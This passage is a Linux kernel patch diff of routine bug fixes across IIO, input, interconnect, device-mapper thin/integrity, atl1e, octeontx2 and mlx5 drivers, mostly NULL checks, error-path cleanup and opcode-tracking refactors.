+index 8d4fc97d10059..2b7873e8a959b 100644
+--- a/drivers/iio/buffer/industrialio-triggered-buffer.c
++++ b/drivers/iio/buffer/industrialio-triggered-buffer.c
+@@ -46,6 +46,16 @@ int iio_triggered_buffer_setup_ext(struct iio_dev *indio_dev,
+ 	struct iio_buffer *buffer;
+ 	int ret;
+ 
++	/*
++	 * iio_triggered_buffer_cleanup() assumes that the buffer allocated here
++	 * is assigned to indio_dev->buffer but this is only the case if this
++	 * function is the first caller to iio_device_attach_buffer(). If
++	 * indio_dev->buffer is already set then we can't proceed otherwise the
++	 * cleanup function will try to free a buffer that was not allocated here.
++	 */
++	if (indio_dev->buffer)
++		return -EADDRINUSE;
++
+ 	buffer = iio_kfifo_allocate();
+ 	if (!buffer) {
+ 		ret = -ENOMEM;
+diff --git a/drivers/iio/common/ms_sensors/ms_sensors_i2c.c b/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
+index 6633b35a94e69..9c9bc77003c7f 100644
+--- a/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
++++ b/drivers/iio/common/ms_sensors/ms_sensors_i2c.c
+@@ -15,8 +15,8 @@
+ /* Conversion times in us */
+ static const u16 ms_sensors_ht_t_conversion_time[] = { 50000, 25000,
+ 						       13000, 7000 };
+-static const u16 ms_sensors_ht_h_conversion_time[] = { 16000, 3000,
+-						       5000, 8000 };
++static const u16 ms_sensors_ht_h_conversion_time[] = { 16000, 5000,
++						       3000, 8000 };
+ static const u16 ms_sensors_tp_conversion_time[] = { 500, 1100, 2100,
+ 						     4100, 8220, 16440 };
+ 
+diff --git a/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c b/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
+index 86fbbe9040503..19a1ef5351d24 100644
+--- a/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
++++ b/drivers/iio/imu/inv_mpu6050/inv_mpu_core.c
+@@ -736,13 +736,13 @@ inv_mpu6050_read_raw(struct iio_dev *indio_dev,
+ 			ret = inv_mpu6050_sensor_show(st, st->reg->gyro_offset,
+ 						chan->channel2, val);
+ 			mutex_unlock(&st->lock);
+-			return IIO_VAL_INT;
++			return ret;
+ 		case IIO_ACCEL:
+ 			mutex_lock(&st->lock);
+ 			ret = inv_mpu6050_sensor_show(st, st->reg->accl_offset,
+ 						chan->channel2, val);
+ 			mutex_unlock(&st->lock);
+-			return IIO_VAL_INT;
++			return ret;
+ 
+ 		default:
+ 			return -EINVAL;
+diff --git a/drivers/input/keyboard/ipaq-micro-keys.c b/drivers/input/keyboard/ipaq-micro-keys.c
+index 13a66a8e3411f..e0c51189e329c 100644
+--- a/drivers/input/keyboard/ipaq-micro-keys.c
++++ b/drivers/input/keyboard/ipaq-micro-keys.c
+@@ -105,6 +105,9 @@ static int micro_key_probe(struct platform_device *pdev)
+ 	keys->codes = devm_kmemdup(&pdev->dev, micro_keycodes,
+ 			   keys->input->keycodesize * keys->input->keycodemax,
+ 			   GFP_KERNEL);
++	if (!keys->codes)
++		return -ENOMEM;
++
+ 	keys->input->keycode = keys->codes;
+ 
+ 	__set_bit(EV_KEY, keys->input->evbit);
+diff --git a/drivers/input/misc/soc_button_array.c b/drivers/input/misc/soc_button_array.c
+index e79f5497948b8..9116f4248fd09 100644
+--- a/drivers/input/misc/soc_button_array.c
++++ b/drivers/input/misc/soc_button_array.c
+@@ -299,6 +299,11 @@ static int soc_button_parse_btn_desc(struct device *dev,
+ 		info->name = "power";
+ 		info->event_code = KEY_POWER;
+ 		info->wakeup = true;
++	} else if (upage == 0x01 && usage == 0xc6) {
++		info->name = "airplane mode switch";
++		info->event_type = EV_SW;
++		info->event_code = SW_RFKILL_ALL;
++		info->active_low = false;
+ 	} else if (upage == 0x01 && usage == 0xca) {
+ 		info->name = "rotation lock switch";
+ 		info->event_type = EV_SW;
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 0c6fc954e7296..1d9494f64a215 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -381,6 +381,9 @@ struct icc_node_data *of_icc_get_from_provider(struct of_phandle_args *spec)
+ 	}
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return ERR_PTR(-EINVAL);
++
+ 	if (IS_ERR(node))
+ 		return ERR_CAST(node);
+ 
+diff --git a/drivers/interconnect/qcom/sm8250.c b/drivers/interconnect/qcom/sm8250.c
+index 5cdb058fa0959..9c2dd40d9a559 100644
+--- a/drivers/interconnect/qcom/sm8250.c
++++ b/drivers/interconnect/qcom/sm8250.c
+@@ -551,6 +551,7 @@ static struct platform_driver qnoc_driver = {
+ 	.driver = {
+ 		.name = "qnoc-sm8250",
+ 		.of_match_table = qnoc_of_match,
++		.sync_state = icc_sync_state,
+ 	},
+ };
+ module_platform_driver(qnoc_driver);
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 382c5cc471952..100a6a236d92a 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -1914,6 +1914,13 @@ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_client_destroy);
+ 
++void dm_bufio_client_reset(struct dm_bufio_client *c)
++{
++	drop_buffers(c);
++	flush_work(&c->shrink_work);
++}
++EXPORT_SYMBOL_GPL(dm_bufio_client_reset);
++
+ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ {
+ 	c->start = start;
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index fe7dad3ffa75f..77fcff82c82ac 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -1763,11 +1763,12 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
++			struct bio_vec bv_copy = bv;
+ 			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+-			mem = bvec_kmap_local(&bv);
++			mem = bvec_kmap_local(&bv_copy);
+ 			pos = 0;
+ 			checksums_ptr = checksums;
+ 			do {
+@@ -1776,7 +1777,7 @@ again:
+ 				sectors_to_process -= ic->sectors_per_block;
+ 				pos += ic->sectors_per_block << SECTOR_SHIFT;
+ 				sector += ic->sectors_per_block;
+-			} while (pos < bv.bv_len && sectors_to_process && checksums != checksums_onstack);
++			} while (pos < bv_copy.bv_len && sectors_to_process && checksums != checksums_onstack);
+ 			kunmap_local(mem);
+ 
+ 			r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+@@ -1801,9 +1802,9 @@ again:
+ 			if (!sectors_to_process)
+ 				break;
+ 
+-			if (unlikely(pos < bv.bv_len)) {
+-				bv.bv_offset += pos;
+-				bv.bv_len -= pos;
++			if (unlikely(pos < bv_copy.bv_len)) {
++				bv_copy.bv_offset += pos;
++				bv_copy.bv_len -= pos;
+ 				goto again;
+ 			}
+ 		}
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 4a0e15109997b..bb0e0a270f62a 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -597,6 +597,8 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 	r = dm_tm_create_with_sm(pmd->bm, THIN_SUPERBLOCK_LOCATION,
+ 				 &pmd->tm, &pmd->metadata_sm);
+ 	if (r < 0) {
++		pmd->tm = NULL;
++		pmd->metadata_sm = NULL;
+ 		DMERR("tm_create_with_sm failed");
+ 		return r;
+ 	}
+@@ -605,6 +607,7 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 	if (IS_ERR(pmd->data_sm)) {
+ 		DMERR("sm_disk_create failed");
+ 		r = PTR_ERR(pmd->data_sm);
++		pmd->data_sm = NULL;
+ 		goto bad_cleanup_tm;
+ 	}
+ 
+@@ -635,11 +638,15 @@ static int __format_metadata(struct dm_pool_metadata *pmd)
+ 
+ bad_cleanup_nb_tm:
+ 	dm_tm_destroy(pmd->nb_tm);
++	pmd->nb_tm = NULL;
+ bad_cleanup_data_sm:
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ bad_cleanup_tm:
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ 
+ 	return r;
+ }
+@@ -705,6 +712,8 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 			       sizeof(disk_super->metadata_space_map_root),
+ 			       &pmd->tm, &pmd->metadata_sm);
+ 	if (r < 0) {
++		pmd->tm = NULL;
++		pmd->metadata_sm = NULL;
+ 		DMERR("tm_open_with_sm failed");
+ 		goto bad_unlock_sblock;
+ 	}
+@@ -714,6 +723,7 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 	if (IS_ERR(pmd->data_sm)) {
+ 		DMERR("sm_disk_open failed");
+ 		r = PTR_ERR(pmd->data_sm);
++		pmd->data_sm = NULL;
+ 		goto bad_cleanup_tm;
+ 	}
+ 
+@@ -740,9 +750,12 @@ static int __open_metadata(struct dm_pool_metadata *pmd)
+ 
+ bad_cleanup_data_sm:
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ bad_cleanup_tm:
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ bad_unlock_sblock:
+ 	dm_bm_unlock(sblock);
+ 
+@@ -789,9 +802,13 @@ static void __destroy_persistent_data_objects(struct dm_pool_metadata *pmd,
+ 					      bool destroy_bm)
+ {
+ 	dm_sm_destroy(pmd->data_sm);
++	pmd->data_sm = NULL;
+ 	dm_sm_destroy(pmd->metadata_sm);
++	pmd->metadata_sm = NULL;
+ 	dm_tm_destroy(pmd->nb_tm);
++	pmd->nb_tm = NULL;
+ 	dm_tm_destroy(pmd->tm);
++	pmd->tm = NULL;
+ 	if (destroy_bm)
+ 		dm_block_manager_destroy(pmd->bm);
+ }
+@@ -999,8 +1016,7 @@ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ 			       __func__, r);
+ 	}
+ 	pmd_write_unlock(pmd);
+-	if (!pmd->fail_io)
+-		__destroy_persistent_data_objects(pmd, true);
++	__destroy_persistent_data_objects(pmd, true);
+ 
+ 	kfree(pmd);
+ 	return 0;
+@@ -1875,53 +1891,29 @@ static void __set_abort_with_changes_flags(struct dm_pool_metadata *pmd)
+ int dm_pool_abort_metadata(struct dm_pool_metadata *pmd)
+ {
+ 	int r = -EINVAL;
+-	struct dm_block_manager *old_bm = NULL, *new_bm = NULL;
+ 
+ 	/* fail_io is double-checked with pmd->root_lock held below */
+ 	if (unlikely(pmd->fail_io))
+ 		return r;
+ 
+-	/*
+-	 * Replacement block manager (new_bm) is created and old_bm destroyed outside of
+-	 * pmd root_lock to avoid ABBA deadlock that would result (due to life-cycle of
+-	 * shrinker associated with the block manager's bufio client vs pmd root_lock).
+-	 * - must take shrinker_rwsem without holding pmd->root_lock
+-	 */
+-	new_bm = dm_block_manager_create(pmd->bdev, THIN_METADATA_BLOCK_SIZE << SECTOR_SHIFT,
+-					 THIN_MAX_CONCURRENT_LOCKS);
+-
+ 	pmd_write_lock(pmd);
+ 	if (pmd->fail_io) {
+ 		pmd_write_unlock(pmd);
+-		goto out;
++		return r;
+ 	}
+-
+ 	__set_abort_with_changes_flags(pmd);
++
++	/* destroy data_sm/metadata_sm/nb_tm/tm */
+ 	__destroy_persistent_data_objects(pmd, false);
+-	old_bm = pmd->bm;
+-	if (IS_ERR(new_bm)) {
+-		DMERR("could not create block manager during abort");
+-		pmd->bm = NULL;
+-		r = PTR_ERR(new_bm);
+-		goto out_unlock;
+-	}
+ 
+-	pmd->bm = new_bm;
++	/* reset bm */
++	dm_block_manager_reset(pmd->bm);
++
++	/* rebuild data_sm/metadata_sm/nb_tm/tm */
+ 	r = __open_or_format_metadata(pmd, false);
+-	if (r) {
+-		pmd->bm = NULL;
+-		goto out_unlock;
+-	}
+-	new_bm = NULL;
+-out_unlock:
+ 	if (r)
+ 		pmd->fail_io = true;
+ 	pmd_write_unlock(pmd);
+-	dm_block_manager_destroy(old_bm);
+-out:
+-	if (new_bm && !IS_ERR(new_bm))
+-		dm_block_manager_destroy(new_bm);
+-
+ 	return r;
+ }
+ 
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 1f40100908d7c..2bbfbb704c751 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -415,6 +415,12 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
++void dm_block_manager_reset(struct dm_block_manager *bm)
++{
++	dm_bufio_client_reset(bm->bufio);
++}
++EXPORT_SYMBOL_GPL(dm_block_manager_reset);
++
+ unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index 58a23b8ec1902..4371d85d3c258 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -35,6 +35,7 @@ struct dm_block_manager *dm_block_manager_create(
+ 	struct block_device *bdev, unsigned int block_size,
+ 	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
++void dm_block_manager_reset(struct dm_block_manager *bm);
+ 
+ unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+diff --git a/drivers/md/persistent-data/dm-space-map.h b/drivers/md/persistent-data/dm-space-map.h
+index a015cd11f6e97..85aa0a3974fe0 100644
+--- a/drivers/md/persistent-data/dm-space-map.h
++++ b/drivers/md/persistent-data/dm-space-map.h
+@@ -76,7 +76,8 @@ struct dm_space_map {
+ 
+ static inline void dm_sm_destroy(struct dm_space_map *sm)
+ {
+-	sm->destroy(sm);
++	if (sm)
++		sm->destroy(sm);
+ }
+ 
+ static inline int dm_sm_extend(struct dm_space_map *sm, dm_block_t extra_blocks)
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.c b/drivers/md/persistent-data/dm-transaction-manager.c
+index 39885f8355847..557a3ecfe75a0 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.c
++++ b/drivers/md/persistent-data/dm-transaction-manager.c
+@@ -197,6 +197,9 @@ EXPORT_SYMBOL_GPL(dm_tm_create_non_blocking_clone);
+ 
+ void dm_tm_destroy(struct dm_transaction_manager *tm)
+ {
++	if (!tm)
++		return;
++
+ 	if (!tm->is_clone)
+ 		wipe_shadow_table(tm);
+ 
+diff --git a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+index 5935be190b9e2..5f2a6fcba9670 100644
+--- a/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
++++ b/drivers/net/ethernet/atheros/atl1e/atl1e_main.c
+@@ -866,10 +866,13 @@ static int atl1e_setup_ring_resources(struct atl1e_adapter *adapter)
+ 		netdev_err(adapter->netdev, "offset(%d) > ring size(%d) !!\n",
+ 			   offset, adapter->ring_size);
+ 		err = -1;
+-		goto failed;
++		goto free_buffer;
+ 	}
+ 
+ 	return 0;
++free_buffer:
++	kfree(tx_ring->tx_buffer);
++	tx_ring->tx_buffer = NULL;
+ failed:
+ 	if (adapter->ring_vir_addr != NULL) {
+ 		dma_free_coherent(&pdev->dev, adapter->ring_size,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+index bfddbff7bcdfb..28fb643d2917f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+@@ -399,9 +399,10 @@ static int otx2_dcbnl_ieee_getpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ static int otx2_dcbnl_ieee_setpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ {
+ 	struct otx2_nic *pfvf = netdev_priv(dev);
++	u8 old_pfc_en;
+ 	int err;
+ 
+-	/* Save PFC configuration to interface */
++	old_pfc_en = pfvf->pfc_en;
+ 	pfvf->pfc_en = pfc->pfc_en;
+ 
+ 	if (pfvf->hw.tx_queues >= NIX_PF_PFC_PRIO_MAX)
+@@ -411,13 +412,17 @@ static int otx2_dcbnl_ieee_setpfc(struct net_device *dev, struct ieee_pfc *pfc)
+ 	 * supported by the tx queue configuration
+ 	 */
+ 	err = otx2_check_pfc_config(pfvf);
+-	if (err)
++	if (err) {
++		pfvf->pfc_en = old_pfc_en;
+ 		return err;
++	}
+ 
+ process_pfc:
+ 	err = otx2_config_priority_flow_ctrl(pfvf);
+-	if (err)
++	if (err) {
++		pfvf->pfc_en = old_pfc_en;
+ 		return err;
++	}
+ 
+ 	/* Request Per channel Bpids */
+ 	if (pfc->pfc_en)
+@@ -425,6 +430,12 @@ process_pfc:
+ 
+ 	err = otx2_pfc_txschq_update(pfvf);
+ 	if (err) {
++		if (pfc->pfc_en)
++			otx2_nix_config_bp(pfvf, false);
++
++		otx2_pfc_txschq_stop(pfvf);
++		pfvf->pfc_en = old_pfc_en;
++		otx2_config_priority_flow_ctrl(pfvf);
+ 		dev_err(pfvf->dev, "%s failed to update TX schedulers\n", __func__);
+ 		return err;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+index b3253e263ebc8..ac6a0785b10d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c
+@@ -48,6 +48,25 @@
+ #define CREATE_TRACE_POINTS
+ #include "diag/cmd_tracepoint.h"
+ 
++struct mlx5_ifc_mbox_out_bits {
++	u8         status[0x8];
++	u8         reserved_at_8[0x18];
++
++	u8         syndrome[0x20];
++
++	u8         reserved_at_40[0x40];
++};
++
++struct mlx5_ifc_mbox_in_bits {
++	u8         opcode[0x10];
++	u8         uid[0x10];
++
++	u8         reserved_at_20[0x10];
++	u8         op_mod[0x10];
++
++	u8         reserved_at_40[0x40];
++};
++
+ enum {
+ 	CMD_IF_REV = 5,
+ };
+@@ -71,6 +90,26 @@ enum {
+ 	MLX5_CMD_DELIVERY_STAT_CMD_DESCR_ERR		= 0x10,
+ };
+ 
++static u16 in_to_opcode(void *in)
++{
++	return MLX5_GET(mbox_in, in, opcode);
++}
++
++/* Returns true for opcodes that might be triggered very frequently and throttle
++ * the command interface. Limit their command slots usage.
++ */
++static bool mlx5_cmd_is_throttle_opcode(u16 op)
++{
++	switch (op) {
++	case MLX5_CMD_OP_CREATE_GENERAL_OBJECT:
++	case MLX5_CMD_OP_DESTROY_GENERAL_OBJECT:
++	case MLX5_CMD_OP_MODIFY_GENERAL_OBJECT:
++	case MLX5_CMD_OP_QUERY_GENERAL_OBJECT:
++		return true;
++	}
++	return false;
++}
++
+ static struct mlx5_cmd_work_ent *
+ cmd_alloc_ent(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in,
+ 	      struct mlx5_cmd_msg *out, void *uout, int uout_size,
+@@ -92,6 +131,7 @@ cmd_alloc_ent(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in,
+ 	ent->context	= context;
+ 	ent->cmd	= cmd;
+ 	ent->page_queue = page_queue;
++	ent->op         = in_to_opcode(in->first.data);
+ 	refcount_set(&ent->refcnt, 1);
+ 
+ 	return ent;
+@@ -116,24 +156,27 @@ static u8 alloc_token(struct mlx5_cmd *cmd)
+ 	return token;
+ }
+ 
+-static int cmd_alloc_index(struct mlx5_cmd *cmd)
++static int cmd_alloc_index(struct mlx5_cmd *cmd, struct mlx5_cmd_work_ent *ent)
+ {
+ 	unsigned long flags;
+ 	int ret;
+ 
+ 	spin_lock_irqsave(&cmd->alloc_lock, flags);
+-	ret = find_first_bit(&cmd->bitmask, cmd->max_reg_cmds);
+-	if (ret < cmd->max_reg_cmds)
+-		clear_bit(ret, &cmd->bitmask);
++	ret = find_first_bit(&cmd->vars.bitmask, cmd->vars.max_reg_cmds);
++	if (ret < cmd->vars.max_reg_cmds) {
++		clear_bit(ret, &cmd->vars.bitmask);
++		ent->idx = ret;
++		cmd->ent_arr[ent->idx] = ent;
++	}
+ 	spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 
+-	return ret < cmd->max_reg_cmds ? ret : -ENOMEM;
++	return ret < cmd->vars.max_reg_cmds ? ret : -ENOMEM;
+ }
+ 
+ static void cmd_free_index(struct mlx5_cmd *cmd, int idx)
+ {
+ 	lockdep_assert_held(&cmd->alloc_lock);
+-	set_bit(idx, &cmd->bitmask);
++	set_bit(idx, &cmd->vars.bitmask);
+ }
+ 
+ static void cmd_ent_get(struct mlx5_cmd_work_ent *ent)
+@@ -152,7 +195,7 @@ static void cmd_ent_put(struct mlx5_cmd_work_ent *ent)
+ 
+ 	if (ent->idx >= 0) {
+ 		cmd_free_index(cmd, ent->idx);
+-		up(ent->page_queue ? &cmd->pages_sem : &cmd->sem);
++		up(ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem);
+ 	}
+ 
+ 	cmd_free_ent(ent);
+@@ -162,7 +205,7 @@ out:
+ 
+ static struct mlx5_cmd_layout *get_inst(struct mlx5_cmd *cmd, int idx)
+ {
+-	return cmd->cmd_buf + (idx << cmd->log_stride);
++	return cmd->cmd_buf + (idx << cmd->vars.log_stride);
+ }
+ 
+ static int mlx5_calc_cmd_blocks(struct mlx5_cmd_msg *msg)
+@@ -753,25 +796,6 @@ static int cmd_status_to_err(u8 status)
+ 	}
+ }
+ 
+-struct mlx5_ifc_mbox_out_bits {
+-	u8         status[0x8];
+-	u8         reserved_at_8[0x18];
+-
+-	u8         syndrome[0x20];
+-
+-	u8         reserved_at_40[0x40];
+-};
+-
+-struct mlx5_ifc_mbox_in_bits {
+-	u8         opcode[0x10];
+-	u8         uid[0x10];
+-
+-	u8         reserved_at_20[0x10];
+-	u8         op_mod[0x10];
+-
+-	u8         reserved_at_40[0x40];
+-};
+-
+ void mlx5_cmd_out_err(struct mlx5_core_dev *dev, u16 opcode, u16 op_mod, void *out)
+ {
+ 	u32 syndrome = MLX5_GET(mbox_out, out, syndrome);
+@@ -789,7 +813,7 @@ static void cmd_status_print(struct mlx5_core_dev *dev, void *in, void *out)
+ 	u16 opcode, op_mod;
+ 	u16 uid;
+ 
+-	opcode = MLX5_GET(mbox_in, in, opcode);
++	opcode = in_to_opcode(in);
+ 	op_mod = MLX5_GET(mbox_in, in, op_mod);
+ 	uid    = MLX5_GET(mbox_in, in, uid);
+ 
+@@ -801,7 +825,7 @@ int mlx5_cmd_check(struct mlx5_core_dev *dev, int err, void *in, void *out)
+ {
+ 	/* aborted due to PCI error or via reset flow mlx5_cmd_trigger_completions() */
+ 	if (err == -ENXIO) {
+-		u16 opcode = MLX5_GET(mbox_in, in, opcode);
++		u16 opcode = in_to_opcode(in);
+ 		u32 syndrome;
+ 		u8 status;
+ 
+@@ -830,9 +854,9 @@ static void dump_command(struct mlx5_core_dev *dev,
+ 			 struct mlx5_cmd_work_ent *ent, int input)
+ {
+ 	struct mlx5_cmd_msg *msg = input ? ent->in : ent->out;
+-	u16 op = MLX5_GET(mbox_in, ent->lay->in, opcode);
+ 	struct mlx5_cmd_mailbox *next = msg->next;
+ 	int n = mlx5_calc_cmd_blocks(msg);
++	u16 op = ent->op;
+ 	int data_only;
+ 	u32 offset = 0;
+ 	int dump_len;
+@@ -884,11 +908,6 @@ static void dump_command(struct mlx5_core_dev *dev,
+ 	mlx5_core_dbg(dev, "cmd[%d]: end dump\n", ent->idx);
+ }
+ 
+-static u16 msg_to_opcode(struct mlx5_cmd_msg *in)
+-{
+-	return MLX5_GET(mbox_in, in->first.data, opcode);
+-}
+-
+ static void mlx5_cmd_comp_handler(struct mlx5_core_dev *dev, u64 vec, bool forced);
+ 
+ static void cb_timeout_handler(struct work_struct *work)
+@@ -906,13 +925,13 @@ static void cb_timeout_handler(struct work_struct *work)
+ 	/* Maybe got handled by eq recover ? */
+ 	if (!test_bit(MLX5_CMD_ENT_STATE_PENDING_COMP, &ent->state)) {
+ 		mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) Async, recovered after timeout\n", ent->idx,
+-			       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 		goto out; /* phew, already handled */
+ 	}
+ 
+ 	ent->ret = -ETIMEDOUT;
+ 	mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) Async, timeout. Will cause a leak of a command resource\n",
+-		       ent->idx, mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++		       ent->idx, mlx5_command_str(ent->op), ent->op);
+ 	mlx5_cmd_comp_handler(dev, 1ULL << ent->idx, true);
+ 
+ out:
+@@ -955,10 +974,10 @@ static void cmd_work_handler(struct work_struct *work)
+ 	cb_timeout = msecs_to_jiffies(mlx5_tout_ms(dev, CMD));
+ 
+ 	complete(&ent->handling);
+-	sem = ent->page_queue ? &cmd->pages_sem : &cmd->sem;
++	sem = ent->page_queue ? &cmd->vars.pages_sem : &cmd->vars.sem;
+ 	down(sem);
+ 	if (!ent->page_queue) {
+-		alloc_ret = cmd_alloc_index(cmd);
++		alloc_ret = cmd_alloc_index(cmd, ent);
+ 		if (alloc_ret < 0) {
+ 			mlx5_core_err_rl(dev, "failed to allocate command entry\n");
+ 			if (ent->callback) {
+@@ -973,20 +992,18 @@ static void cmd_work_handler(struct work_struct *work)
+ 			up(sem);
+ 			return;
+ 		}
+-		ent->idx = alloc_ret;
+ 	} else {
+-		ent->idx = cmd->max_reg_cmds;
++		ent->idx = cmd->vars.max_reg_cmds;
+ 		spin_lock_irqsave(&cmd->alloc_lock, flags);
+-		clear_bit(ent->idx, &cmd->bitmask);
++		clear_bit(ent->idx, &cmd->vars.bitmask);
++		cmd->ent_arr[ent->idx] = ent;
+ 		spin_unlock_irqrestore(&cmd->alloc_lock, flags);
+ 	}
+ 
+-	cmd->ent_arr[ent->idx] = ent;
+ 	lay = get_inst(cmd, ent->idx);
+ 	ent->lay = lay;
+ 	memset(lay, 0, sizeof(*lay));
+ 	memcpy(lay->in, ent->in->first.data, sizeof(lay->in));
+-	ent->op = be32_to_cpu(lay->in[0]) >> 16;
+ 	if (ent->in->next)
+ 		lay->in_ptr = cpu_to_be64(ent->in->next->dma);
+ 	lay->inlen = cpu_to_be32(ent->in->len);
+@@ -1099,12 +1116,12 @@ static void wait_func_handle_exec_timeout(struct mlx5_core_dev *dev,
+ 	 */
+ 	if (wait_for_completion_timeout(&ent->done, timeout)) {
+ 		mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) recovered after timeout\n", ent->idx,
+-			       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 		return;
+ 	}
+ 
+ 	mlx5_core_warn(dev, "cmd[%d]: %s(0x%x) No done completion\n", ent->idx,
+-		       mlx5_command_str(msg_to_opcode(ent->in)), msg_to_opcode(ent->in));
++		       mlx5_command_str(ent->op), ent->op);
+ 
+ 	ent->ret = -ETIMEDOUT;
+ 	mlx5_cmd_comp_handler(dev, 1ULL << ent->idx, true);
+@@ -1131,12 +1148,10 @@ out_err:
+ 
+ 	if (err == -ETIMEDOUT) {
+ 		mlx5_core_warn(dev, "%s(0x%x) timeout. Will cause a leak of a command resource\n",
+-			       mlx5_command_str(msg_to_opcode(ent->in)),
+-			       msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 	} else if (err == -ECANCELED) {
+ 		mlx5_core_warn(dev, "%s(0x%x) canceled on out of queue timeout.\n",
+-			       mlx5_command_str(msg_to_opcode(ent->in)),
+-			       msg_to_opcode(ent->in));
++			       mlx5_command_str(ent->op), ent->op);
+ 	}
+ 	mlx5_core_dbg(dev, "err %d, delivery status %s(%d)\n",
+ 		      err, deliv_status_to_str(ent->status), ent->status);
+@@ -1170,7 +1185,6 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	u8 status = 0;
+ 	int err = 0;
+ 	s64 ds;
+-	u16 op;
+ 
+ 	if (callback && page_queue)
+ 		return -EINVAL;
+@@ -1210,9 +1224,8 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 		goto out_free;
+ 
+ 	ds = ent->ts2 - ent->ts1;
+-	op = MLX5_GET(mbox_in, in->first.data, opcode);
+-	if (op < MLX5_CMD_OP_MAX) {
+-		stats = &cmd->stats[op];
++	if (ent->op < MLX5_CMD_OP_MAX) {
++		stats = &cmd->stats[ent->op];
+ 		spin_lock_irq(&stats->lock);
+ 		stats->sum += ds;
+ 		++stats->n;
+@@ -1220,7 +1233,7 @@ static int mlx5_cmd_invoke(struct mlx5_core_dev *dev, struct mlx5_cmd_msg *in,
+ 	}
+ 	mlx5_core_dbg_mask(dev, 1 << MLX5_CMD_TIME,
+ 			   "fw exec time for %s is %lld nsec\n",
+-			   mlx5_command_str(op), ds);
++			   mlx5_command_str(ent->op), ds);
+ 
+ out_free:
